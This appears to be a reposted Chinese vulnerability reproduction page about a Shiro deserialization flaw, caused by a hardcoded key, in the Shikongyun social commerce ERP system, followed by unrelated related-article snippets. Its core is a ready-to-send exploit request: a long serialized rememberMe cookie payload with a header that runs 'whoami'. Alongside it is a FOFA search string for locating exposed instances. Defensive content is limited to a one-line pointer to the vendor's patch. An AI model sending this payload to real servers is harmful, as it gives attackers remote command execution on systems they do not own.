云时空社会化商业 ERP 系统 Shiro 反序列化漏洞复现

news2025/1/19 11:05:35

0x01 产品简介

   时空云社会化商业ERP(简称时空云ERP) ,该产品采用JAVA语言和Oracle数据库, 融合用友软件的先进管理理念,汇集各医药企业特色管理需求,通过规范各个流通环节从而提高企业竞争力、降低人员成本,最终实现全面服务于医药批发、零售连锁企业的信息化建设的目标,是一款全面贴合最新GSP要求的医药流通行业一站式管理系统。

0x02 漏洞概述

   云时空社会化商业 ERP 系统存在 shiro 反序列化漏洞,该漏洞源于软件存在硬编码的 shiro-key,攻击者可利用该 key 生成恶意的序列化数据,在服务器上执行任意代码,执行系统命令、或打入内存马等,获取服务器权限。

0x03 复现环境

FOFA:app="云时空社会化商业ERP系统"

0x04 漏洞复现 

Exp

GET /static/js/public.js HTTP/1.1
Host: your-ip
Cookie: rememberMe=Y0ZDMzQ3ZUY0YjgzQzJGRfD/yYOCgtFSRejkdE0zNiiBOhIMgn3NN9BbwEQ3P2WALvKFi08Isnf2EPCMrlNsXLP5HflusByGrvRGQI4x3wehRa1z5zGj/crir3jcDk0cza0AyInlFzzZ15VaebrOHES4Op2AsEEsfrxpfG8dWTjzfIeVdlVCHd5fWRq9wZJotwWU9/Ok2mW2RiAAuIDYOIN9QCiSAjsaBnjWpA26wajl387SJPpHwD27KjuO/u0YPAdadqCPYtQzDag9GFSs7T3oSS2q7CuompYNLcghaTulRwliYjqvVGXBSgWmUbmfS4/i2Ev5C/z+gvS0lkcio+9ooR200lxdzYsWUQHw98dEavK6nb2ZXR/sAFv4SyFVBugMEylYkAMRxXMfIs2S0qJLNwSAbOCcCl5MECcLHUo78MjMKtyI93pp/9cMck+f1cvRtFFpa6goKo1r64c24XjZjPKrgZdEb4xpvtEV9qnILxDGgYweefO86zlAobSVlmcOvitSpQS1jomRoB1ybbM9/EO4ARpobWNk4QGkm7C/guulQS9u4mo5bzGiLp4IeDd7hwz0SHh/ePlYIrRISP0rGk89enW3hZro+fvjv5pL0cyUgDFrIWRWAsv3qmqRhr0V9Vb2CaMN82vTTwj673HEjXAKGTMM0LQQIofgxhcY0pqP0sNCsl8YHn0pbBxka31UIFvtJVfqI3FWGvhw0KsVOIFtSsN0/TA8XwY0SEF3+oGcMqY0LNpEmc5XwpI46r/L7M7BLp2+oNqfTmCXTO/S+Qhd25h47x8Atx9L1ps7P319hxM+KaVpbCQrgwcZa+Ai5HihS98YrCny99N7OzrsbWNuozxr2uKQzu1ybSH+rXWwSQPIGZcjtbF8SjIZE/DE0r4G4RULe6/OdJPCl0ASbVZCRgL7ihXdCwnOsBSI3o3TxxDsBTvblZM8W5KB+ubX2/s3nydQQRymUZmAHrYE6xzHviRpiqYIr6d/ZPbhGhfWYS8wa0ShETq5iPi074aTxlGUK5Va6dwR7OGHaGhUg6ZM3JEjESCohjynBSulXrjscTyg9WVsOQSGCE1Hh4oHJ6Q65IUqlk1K4IE4CGcMm1xqHqieBIUj9oMRPCjMrrawfDcFk1zmeeGkN9f04Rt1JPDELugwRExfogC78mvdHUUwM+4p/cyEKD0j/Ws0eWavkvkld9vERo/gSgAive8in4S6YjDrxlW1sPcZPBtXBVJhtZ9Sa/KjKWc5vt7XwjOqenoSXFEafGYiPTb1Knq5jkze+WZK+hmN5fVDTeKDuz6J8F7oykOSGMa/PwTW7XevwzU5zserYOGJ9akUdAjFrVCtydCq05a8+Ht0isGIIwvefcclTlC8D5MV06rCHD/VTTgpSKzAq4lFnnvm9C67giCjTA+yk0JwJE0Ase1oqe7NvL29YsRAA+ZQ2dbI+vE1byXBfOJefW5zEREP4Ml/cqG2wC0/uTbixYmW1TmB/GkcbSrg2kVBvfFMeVgXGYUwkVTeFHokqi7hdhSCI7EEROYpc+c86gowPnNWrc7i1A0gjaiLHjwWo5HtgCIZfv9dCkn3Ht39T0pYw1+3yiPS6mM6XPvHkr8E6EHxI0xyGpXwt7cjrsFsPpTFWT3GgnLsmPG0VxWUXGWF4KuBJ/mNtNNxg/WL0+qIeQiOWjlRhZf2sjHKJODRzPclZ5V+8DQl+5e9rjisxzZYOKS/qFo2sztJqnCVmRAHeRF+hoE21OVe/YIsaF0xaQwkaH4tf3adM0QalUJeS4PdyoC4M1fSN0E2+SewrsVLg1VbA+sAbihobb+0EW05WXgWOfEG314m7xSyZnf4AHYar45D6o7HrAiR+qGDlmfTcMcTzMat7jNbnbm86RgD5VEGk1O5Jd7C9rGv1Iu9jS0OVZ4p0l/rLWHOV3Mfdc/J3th2G9c+uLPMVCfVrt6/HJs+Nu9hcfryTL7fbpVTFNc4FTyhsjUWFFEdd7fMd43xumo4ie6P7vQUAveBrYeE/cYxFfS81CpoRhOqY97SAy+NC7yXoyzkmB3ULkx5mSvnKUJDow3GiVvZL9lsZdQzGEnQS66hC5CLkfk0LDdPsLiKpw1TKyVBhXhQ4yrJ9ehZlOx0l6VslasmXmC/ujlSnANs2UeRtMHrrFXpb0ltqvp8NWnTZVwmxnWbYUch3IYegkoseDb3bhkTxkkk/r7xZyt6Tg825TGfjpTrokRP5B9/CIWGeiwUUEJOoZcFEnvyKWvrgYgm45jtTS7gx05viEVgYyKZG23gC3Wo3uYUFlqxuFuSd+pDO/0LEOTrZOg4djXEQ67vHaPbeJ87eAilkjIE6GL4JvRpZNVysDRp5/INsiciu/SD6F7ubKcC6GvOuzOdVeGWH0nepDDNCW1wDXEXbzZYmYeTOAxi47hYJvZ/PDhAN6KVgetneACTL/oddg396OGRS2D291U9FDLAe+5Qfv3YHcbFpdr/GWmFtj1dnaQjXvTkEfWCrOIWJeNJJxqbXv0JMHmUmfh2YtEKNqHbxkCeck9E/95wPwHgBf6TARjJcJYdYiMl2Iioif9ROpx84Hxzat3joVBsNhCGWCrJ5hM1YKp/zLvCrJEdQ1sItJEITn6VeNIxelU6czqI0YrwTdRTPkxANSwiHwaRdg/qmGFRTbOOFldLwBwHPGwnf7wAP7o+1UqJkyaPn+Ga3Qhq9DEfgh/+QsqDunEc26rXVqIQZQIO4qCoXs6qJpl/4DGLnNP+K6PmwdkPxAdu3HbqtxS9ADYJJxQlylNlIxA3rJRRjNGOUe3jN6HY7zXP9ySqNOTrlt+lDI/qJ8n48CS0B1/bpKjJTcMmQwhpCsjPF45R/DxV88RggfISTSE2RrGCK4XkU8dsi3lSYXpFCmL9GULMFXfaBzPKLiKCP7z1NkODfsJ0HnE7NmXEGCoq413X6jNcHFTYJDifeLkp2eiDztRJ2QrirjJuo0jcxrZpN9Lu3MUZw2PUy+BZnp8RA5gplWf4NSK11tLQ/BeB1jHI6XEZmyteLRnl1XuUzSHp+2xdC2mSHiBKJjFfkhX9HOgq5kAnc+BwzZ29sd1QybrL8kks64OFrrjDWBrZ1OdCCbLDDkhiDtyCcEK2gahXT+Vp4Z1lmnsWRFQDt0x719hhwHyM5tZ4Oq2xvLiPJ17djBOOSZihPc+s5qIW2ZrzRl7XOUmtQWZOJ1ROPgXJgiiC9JkI+1YcBCtCoh/qk3Qqc70+7O5MGHhl0EwFaw9VcCeQbQrwQ36zOQAWfjm+g/ai9638T11tVZqvlyPBFbKNZqtHShu0sSkpgW+LFy5jgWXZ+Oc1OtnGji9xScA8Qm9PDMJOaENmL5SWKO3obPOLLr0soSL8hDyR9mtIPB+KrybQt3tQVe6L/8gDr0ebMpTayxhnVJxTbe1ODeZVmfv7nyZWGmHqHpBxJQcG4dYs9U69pTH6JUppZyfyduuBV8QNLOOx6qDQB4BvoUoVAwBOFn/fIww4/Y8Js7ima8ELy8rtVCM549hnwIukxb33AS9iKa6r7wpKSX0izmHe98FrhpQEKT+Dxv4Y79QiWAMbkaRqehn7Lf/F24unSr5Fa4O+rNqw1wsK9hYmEhDiZBF1paE+6NXHXyy7OlavGEM05O/sX5ABYjvJaGHhO7a/fQCJ7owDQ+VEff3AQsIAB5ZFcMjn6EpU+iVq2LhEUyD0TtM4d2/TDcmNGgCLvFrDY6yKwNEvAvbKIsNFQ3mW/FUcpklf9UfocDax2FBfxoGCN9b2r/LBBN6voU7O9R76JfwDZKXdlTEXEqR4wFRzuSVf27EzMc+CmbeTVja/vE3NQYNWu9KA958Q3tAQu7ny7Dr+j1tFfJS2UqOBDQGwOdxAhwEzzRdspo+2oB41kSPFQW04SDcV0C9RAeeEStqx+KnP8hv8BKfH6oDY82YfMx1AOrFEeXXSg6csJ90mu4Xe16FLsVDT6l5zt8Lc1kfHv/qq26+aVOkYkFTJe6wmIrc/ffYgZjCc4XBYHh77tm7hIeX28bufDnIisc+YeSaR5dpzUqU0Oy7qvOQ5MQLo+n1WBG70zZ80SMBftXnZ+DuodllcvsrOTZpjsNwQBiNgpGRvkywrhTAd7q98VDEDjPlKvt3AMmIH87SFF6I4a+jWRYTDDatxxZYaEK2/Ddfz1kCqVRZf9asNJ4gIM/J1PNkTaD+KMeCirjCzCR/0YFwdZQ2u3Eu/3RWjmvoCdrRZgtv4B8AHkIlxc/bRYwx5BAuTfXnPtV3r9sj9xf67J0SY9EhRmIvXs/IljlGBUllbXu64SOgUzuiYMb7Mjvubj30BxwDVCzKNz1DG76P4PzT8uOprijhkaQfJCvB1ukv5LHWzu+KQKygTSAYxM0bylkWm4i968K+v0t6JX355bxg+Dpph5ZC+wuaiEu6T/jgAE+KAjxdxUIXDwIwTt8QoPr6/vQp5sOKhFry5HskVUDsMaDhN0cQN3FMWmb5nPh74qzasmgT7udGIWhECoPhOfMCM4Ia1X4hhlczZdFVs2NGQMeRus9qdzX8tU2BGrcjwK9lc+/jud0+l85wr7Cou1nGuJpe0C7DkcqS8qpf7d8Tt7osw4+Z8fpzYIbdkTSCNXifHCcIlUZ2MrfHp3d35Perpu2LQfly/7IDQKvMk+/Jo4mIxiY0EdHm02zl8GCVcy7CCr8F3aDVTzyZZ5+RWNC4CT0PIlUYxKG0ttamJHv64gqVgF4gHBxEeoI4dBrzHbegDSSAiN4FiLzr4sp6TFtPAYONeRvkbfPa5zG8I+XdhRIf0BkQqPD3P1jhlEdfe/VK+lfDgG2MvBl6E2tS3MmB3f4AN0KnlQhK6a1ni/LjroxrU8elJcdZ4ZpR28Kyi3qR3j3JQd6laudIRhlIjsFnwCz+TuN0km2qKhFMnfySH+anXcwbWRzWYHXYaZjVtFN1uMefi7I06qToWfOFZqvIXsEb4ueBmDy2lvEXg0KhrPrjU5xdEyxjGqxoXycwuwnpBGUvXnVL0fiwTe3kKwOCaWfUutMdbdst2Mb2DlwLejVp4l/XSbiTPqA+35/6eUmJfUiyFvoivf/SLJy9W8OpC6FCs8nJSd2ILHLj1AlBAnITCwvk5rRn9+R2y9h0eY6leXdqQG38auypcBlAYGFQGWvIKRg3flnK9OZqH06VflWwsDDuC+sze4TmkpTSFmrJqstsuZCBJbpNqVQegdU2mzyEfz9zf4cW2O1WsvaOuVMi+twwwbvy09NvOW+ql01HKZRTtT1H08ZoZOoNhVs1vnSBoSkr1rgA+KMRUtdxzIZ3bL0ea6kPBHeAdkS34LloGmIWIb5J8pNiES1I5JF0Fqz262F/A3KtgYmsnPT85ucp6Zv+giKkpjIY37SqcuY+thlHxOVSMecHzDbb8mjXnrfSlzxWaX+LDuISqKH+941K2Ui54Zk43yGLtqjd6LKHNziCskp7dSvHJKeTZrYjTaS0wDEHcZ5xG9QsSPLLmWhg+mRgP51hfSG3sJP7rWhCX4Jql+vAdKoCLsyH+1ULAM8Xt938iOntwJ/dW/dtfQOC1msW0U6nfty8bxMCcUdDnxIi7ukcwtN9QI7lCVp0OVJc96KFGWagNdumn3AbfwyLRgqnm7XLwxEOGj7+ObEHJB67JosifnQLNw2Q2P7zDGxIURydhAaCsIL20/SmfisaET+jsEQGwvoJHApSA8na1pAGOVqudEciA8vLxHsNTUY8LYF7dzPLTB9d+4oelr8qxI54bnagu0LrsxQO9ZHhmct7swM1SX3zz3bNsUHFfhqFbI0hbrJ5c+UKskfVDiCGXBklRNw+w95jc48qftYWjfkWq3OcmBj2Hzz9KX5j3NzMfj1wwcFm9zO0GIpN2qWYfzUvnY9+lcDtjTOjfykRZBnBIieDYuTMzCgL+KSEeRrHCFGkWTQz3f7KTSgRc8TKFuxR6KusupLSmIr+YSC58dA==
X-Token-Data: whoami
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

0x05 修复建议

官方已出修复方案,联系官方获取修复补丁。http://www.ysk360.com/

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1269421.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

SpringMVC多种类型数据响应

SpringMVC多种类型数据响应入门 1.概念 RequestMapping 作用:用于建立请求URL和处理请求方法之间的对应关系 位置: 类上,请求URL的第一级访问目录。此处不写的话,就相当于应用的根目录 方法上,请求URL的第二级访问目…

【二叉树】Leetcode 199. 二叉树的右视图

力扣题目链接 解题思路 一开始&#xff0c;我以为只需要依次遍历最右边一列所有数即可&#xff0c;写出来的代码也通过了样例&#xff1a; class Solution { public:vector<int> rightSideView(TreeNode* root) {vector<int> ans;TreeNode* temp root;while(tem…

游戏缺少d3dx9_43.dll修复方法分享,快速解决dll缺失问题

在计算机使用过程中&#xff0c;我们常常会遇到一些错误提示&#xff0c;其中之一就是“找不到d3dx9_43.dll文件”。这个错误通常出现在运行某些游戏或应用程序时&#xff0c;d3dx9_43.dll是一个动态链接库文件&#xff0c;它是DirectX 9的一部分&#xff0c;用于支持游戏中的3…

LeetCode 7 整数反转

题目描述 整数反转 给你一个 32 位的有符号整数 x &#xff0c;返回将 x 中的数字部分反转后的结果。 如果反转后整数超过 32 位的有符号整数的范围 [−231, 231 − 1] &#xff0c;就返回 0。 假设环境不允许存储 64 位整数&#xff08;有符号或无符号&#xff09;。 示例…

U-boot(七):U-boot移植

本文主要探讨基于210官方U-boot源码移植。 移植基础 tar -jxvf android_uboot_smdkv210.tar.bz2cd u-boot-samsung-devrm -rf onenand_ipl onenand_bl1 lib_avr32 lib_blackfin lib_i386 lib_m68k lib_mips lib_microblaze lib_nios lib_nios2 lib_ppc lib_sh lib_sparccd bo…

Ubuntu防止休眠和挂起(笔记)

目录 1 动机2 禁用休眠3 解除休眠 1 动机 我要将 饿啊人制作成 noah-mp 的区域运行强迫&#xff0c;但是跑的慢&#xff0c;一晚上两天。后来发现是因为电脑自动 supend 了。Ubuntu 在电源那里最多只能设置 2 小时的防止休眠&#xff0c;2小时候又自动休眠&#xff0c;严重影响…

mongodb基本操作命令

mongodb快速搭建及使用 1.mongodb安装1.1 docker安装启动mongodb 2.mongo shell常用命令2.1 插入文档2.1.1 插入单个文档2.1.2 插入多个文档2.1.3 用脚本批量插入 2.2 查询文档 前言&#xff1a;本篇默认你是对nongodb的基础概念有了了解&#xff0c;操作是非常基础的。但是与关…

Opencv手势控制音量!附源码!

效果演示&#xff1a; 废话不多说&#xff01;直接上源码&#xff01;下面写有所有代码注释&#xff01;&#xff01; import cv2 import mediapipe as mp #它包含了各种预训练的机器学习模型&#xff0c;可以用于姿势估计、手势识别等任务 from ctypes import cast, POINTE…

P8649 [蓝桥杯 2017 省 B] k 倍区间(前缀和+优化(桶分类))

分析&#xff1a; &#xff08;1&#xff09;任意连续子序列可用两个前缀和的差来表示 &#xff08;2&#xff09;判断该子序列是否为k的倍数 p1-p2 模 0 (mod k) 等价于&#xff1a;前缀和模 k 是否同余 &#xff08;3&#xff09;同余的任意两前缀和组合的序列均满足…

[React] 2023年最新面试题

[React] 2023年最新面试题 1. class 组件与函数组件的区别2. react 18 新特性有那些?新增 createRoot API自动批处理过渡更新新的Hook 3. redux 和 react-redux 的区别4. redux 中间件的原理5. setState 发生了什么 &#xff0c;render 函数做了什么6. 虚拟DOM&#xff0c; Fi…

【面试】typescript

目录 为什么用TypeScript&#xff1f; TS和JS的区别 控制类成员可见性的访问关键字&#xff1f; public protected&#xff09;&#xff0c;该类及其子类都可以访问它们。 但是该类的实例无法访问。 私有&#xff08;private&#xff09;&#xff0c;只有类的成员可以访问…

JSON.stringify方法详解 后端接受JSON数据格式

1、方法定义&#xff1a;JSON.stringify(value, replacer, space) 参数说明&#xff1a; value&#xff1a;js对象 replacer&#xff1a;替换对象&#xff0c;可以是一个方法、对象或数组&#xff0c;将value按照替换规则展示。 space&#xff1a;填充参数&#xff0c;可以是数…

LVS+Keepalived实验

实验前准备 主DR服务器&#xff1a;(ens33)192.168.188.11 ipvsadm、keepalived (ens33:0)192.168.188.188 备DR服务器&#xff1a;(ens33)192.168.188.12 ipvsadm、keepalived (ens33:0)192.168.188.188 Wbe服务器1&#xff1a;(ens33)192.168.188.13 (lo:0)192.168.188.188 W…

selenium使用记录

本文记录python环境下使用selenium的一些步骤 Step1&#xff1a;安装并配置驱动 pip install selenium # 使用pip在对应python中安装selenium包为了让selenium能调用指定的浏览器&#xff0c;需要下载对应浏览器的驱动程序&#xff08;这里以edge为例子&#xff09; #Firefo…

【Openstack Train安装】四、MariaDB/RabbitMQ 安装

本章介绍了MariaDB/RabbitMQ的安装步骤&#xff0c;MariaDB/RabbitMQ仅需要在控制节点安装。 在安装MariaDB/RabbitMQ前&#xff0c;请确保您按照以下教程进行了相关配置&#xff1a; 【Openstack Train安装】一、虚拟机创建 【Openstack Train安装】二、NTP安装 【Opensta…

改善厦门城市内涝积水问题,实时监测城市易涝积水点

近年来&#xff0c;城市内涝积水问题已成为中国许多城市面临的严峻挑战。特别是在厦门这样的海滨城市&#xff0c;由于其特殊的地理环境和气候条件&#xff0c;内涝问题尤为突出。传统的解决方法主要依赖于人工排查&#xff0c;然而&#xff0c;这种方式存在许多缺陷。 WITBEE万…

BEVFormer【人工智能】

BEVFormer 是一篇今年中稿 ECCV 2022 的论文&#xff0c;其中提出了一种纯视觉&#xff08;camera&#xff09;感知任务的算法模型&#xff0c;用于实现3D目标检测和地图分割任务。该算法通过提取环视相机&#xff08;Bird’s Eye View Camera&#xff09;采集到的图像特征&…

【产品设计】SaaS产品数据分析之指标与标签

数据分析能够应用到各个领域和岗位&#xff0c;那么在SaaS产品中的应用会是如何&#xff1f;本文将探索SaaS产品在数据分析中的应用&#xff0c;并对其指标与标签的设计进行总结分析&#xff0c;一起来看看吧。 数据分析是业务开展过程中&#xff0c;收集记录各种行为产生的数据…

vue2+element-ui npm run build打包后,在服务器打开报错

报错 页面的图标也显示不出来&#xff0c;如下 解决&#xff1a; 在build->utils.js文件里面加上publicPath: ../../&#xff0c;再打包发布一下就可以了 // Extract CSS when that option is specified// (which is the case during production build)if (options.extrac…

数据挖掘之时间序列分析

一、 概念 时间序列&#xff08;Time Series&#xff09; 时间序列是指同一统计指标的数值按其发生的时间先后顺序排列而成的数列&#xff08;是均匀时间间隔上的观测值序列&#xff09;。 时间序列分析的主要目的是根据已有的历史数据对未来进行预测。 时间序列分析主要包…